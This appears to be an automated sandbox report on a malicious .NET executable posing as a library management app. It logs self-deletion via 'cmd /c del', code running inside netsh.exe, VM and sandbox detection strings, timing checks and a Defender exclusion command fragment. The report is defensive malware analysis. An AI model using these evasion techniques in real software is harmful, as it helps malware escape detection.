Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe

File read: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe:Zone.Identifier

Source: unknown	Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process created: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: /IVectorVi;component/views/addbook.xaml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: views/addbook.baml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: views/addcustomer.baml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: /IVectorVi;component/views/addbook.xaml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: views/addcustomer.baml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: views/addbook.baml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: /IVectorVi;component/views/addbook.xaml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: views/addbook.baml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: views/addcustomer.baml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: /IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: O/IVectorVi;component/views/addbook.xamle/IVectorVi;component/views/borrowfrombookview.xaml[/IVectorVi;component/views/borrowingview.xamlU/IVectorVi;component/views/changebook.xaml]/IVectorVi;component/views/changecustomer.xamlY/IVectorVi;component/views/customerview.xaml]/IVectorVi;component/views/deletecustomer.xamlS/IVectorVi;component/views/errorview.xamlW/IVectorVi;component/views/smallextras.xamlW/IVectorVi;component/views/addcustomer.xaml
Source: cK1g5gckZR9VHjj.exe	String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: cK1g5gckZR9VHjj.exe, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.cK1g5gckZR9VHjj.exe.8e0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.2.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.3.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.7.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.5.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.2.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.9.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.cK1g5gckZR9VHjj.exe.560000.0.unpack, Biblan/Views/MainWindow.cs	.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 0_2_008E92F5 push ds; ret	0_2_008E9340
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 0_2_008E9347 push ds; ret	0_2_008E934C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 0_2_008E9361 push ds; retf	0_2_008E9364
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 0_2_053856E0 push esp; iretd	0_2_053856E9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 1_2_002F9361 push ds; retf	1_2_002F9364
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 1_2_002F9347 push ds; ret	1_2_002F934C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 1_2_002F92F5 push ds; ret	1_2_002F9340
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041B822 push eax; ret	2_2_0041B828
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041B82B push eax; ret	2_2_0041B892
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041B88C push eax; ret	2_2_0041B892
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_004153E6 push ss; iretd	2_2_004153EC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041541E push ss; iretd	2_2_004153EC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0041B7D5 push eax; ret	2_2_0041B828
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_005692F5 push ds; ret	2_2_00569340
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00569347 push ds; ret	2_2_0056934C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_00569361 push ds; retf	2_2_00569364
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Code function: 2_2_0103D0D1 push ecx; ret	2_2_0103D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_0381D0D1 push ecx; ret	12_2_0381D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DD53E6 push ss; iretd	12_2_02DD53EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDB88C push eax; ret	12_2_02DDB892
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDB82B push eax; ret	12_2_02DDB892
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDB822 push eax; ret	12_2_02DDB828
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DDB7D5 push eax; ret	12_2_02DDB828
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 12_2_02DD541E push ss; iretd	12_2_02DD53EC

Source: C:\Windows\SysWOW64\netsh.exe	Process created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
Source: C:\Windows\SysWOW64\netsh.exe	Process created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"			Jump to behavior

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 0.2.cK1g5gckZR9VHjj.exe.2c38e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.cK1g5gckZR9VHjj.exe.2ccaf94.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cK1g5gckZR9VHjj.exe PID: 7160, type: MEMORYSTR

Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002DC8604 second address: 0000000002DC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002DC899E second address: 0000000002DC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556	Thread sleep count: 1934 > 30	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556	Thread sleep count: 1406 > 30	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 7164	Thread sleep time: -36459s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239747s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239639s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239530s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -239047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -238919s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -238796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -238672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -238562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -238452s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -238157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -237500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -237359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -237246s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -237139s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -237031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -236844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -236344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -236109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -235797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -235468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264	Thread sleep time: -235355s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 4624	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239875	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239747	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239639	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239530	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239422	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239296	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239187	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 239047	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 238919	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 238796	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 238672	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 238562	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 238452	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 238157	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 237500	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 237359	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 237246	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 237139	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 237031	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 236844	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 236344	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 236109	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 235797	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 235468	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 235355	Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Window / User API: threadDelayed 1934			Jump to behavior
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe	Window / User API: threadDelayed 1406			Jump to behavior

Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
